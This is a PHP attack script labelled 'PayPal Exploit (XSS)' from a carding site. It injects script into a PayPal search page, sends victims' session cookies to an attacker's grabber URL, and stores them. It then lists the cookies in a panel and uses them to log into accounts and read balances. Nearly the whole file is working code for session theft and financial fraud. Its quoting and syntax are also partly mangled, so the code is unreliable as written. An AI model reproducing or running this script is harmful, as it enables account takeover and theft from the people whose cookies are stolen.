<?php  /* 
 Website: <a href="http://carderx.com" target="_blank">http://carderx.com</a> 
 PayPal Exploit (XSS) 
 Coded by: mainl00p 
 */
 define("PPLOGIN_URL", "https://www.paypal.com/en"); 
 define("PPXSS_URL", "https://www.paypal.com/it/cgi-bin/webscr?cmd=_shop-search-ext&search_cat_name="/>'&q="&search_cat=&region="><iframe  onload=alert(0)/>"); 
 define("COOKIE_FILE", "carderX.txt"); // A COOKIE FILE (WHERE TO STORE THE COOKIES) 
 define("EXPLOIT_URL", "http://carderx.com/temp/exploit.php"); // HERE YOU NEED TO PUT YOUR GRABBER'S URL 
 // I put automatically those fields (_t must be there, it can have random value, I preferred NULL) function doXSS($Vector) 
 { echo "<form id="sui_m" name="sui_m" method="post" class="" action="" . PPXSS_URL . ""> 
 <input type="hidden" name="_t" value=""/> 
 <input type="hidden" name="_fl" value="1" /> 
 <input type="hidden" name="atoi" value="0" /> 
 <input type="hidden" name="min" value="0" /> 
 <input type="hidden" name="max[0]" value="" /> 
 <input type="hidden" name="load" value="$Vector" /> 
 </form> 
 <script type="text/javascript">document.getElementById("sui_m").su bmit();</script>"; 
 } 
 // Gets the cookie from GET parameter returned by XSS and stores it in file 
 function getCookie() { 
 if (isset($_GET["c"])) { 
 $f = fopen(COOKIE_FILE, "a"); 
 $c = base64_encode($_GET["c"]); 
 fwrite($f, $c . "n"); 
 fclose($f); 
 }
 } 
 // Reads the cookie from file 
 function readCookies() { 
 $c = file_get_contents(COOKIE_FILE); 
 return explode("n", $c); } 
 // Logs in and checks the ballance 
 function check($Cookie) { 
 $ch = curl_init(); 
 curl_setopt($ch, CURLOPT_URL, PPLOGIN_URL); 
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); 
 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1); 
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
 curl_setopt($ch, CURLOPT_COOKIE, $Cookie); 
 $s = curl_exec($ch); 
 if (preg_match("/Ballance: (.*)</b>/i", $s, $z)) 
 return $z[1]; 
 return NULL; 
 } 
 // MAIN 
 if (isset($_GET["admin"]) && $_GET["admin"] == "true") { 
 $ck = readCookies(); 
 echo "<table style="font-size: 12px;">n"; 
 echo "<tr style="background-color: red; color: white;"><td style="width: 50px;"><b>Id</b></td><td style="width: 700px;"><b>Cookie</b></td><td><b>Check</b></td></tr>n"; 
 $i = 0; 
 foreach ($ck as $c) { 
 echo "<tr style="background-color: grey;"><td>" .   $i . "</td><td>$c</td><td><a href="?check=" . base64_encode($c) . "">Check</a></td></tr>n"; 
 } 
 die(""); 
 } 
 if (isset($_GET["check"]) && $_GET["check"] != "") { 
 $cz = check(check($_GET["check"])); 
 if ($cz != NULL) echo "Ballance: " . $cz;
 else 
 echo "Error logging in!"; 
 die(""); 
 } 
 $XSS = ""><script>window.location=" . EXPLOIT_URL . "?c=" . ""   document.cookie;</script>"; doXSS($XSS); ?> 
 ?>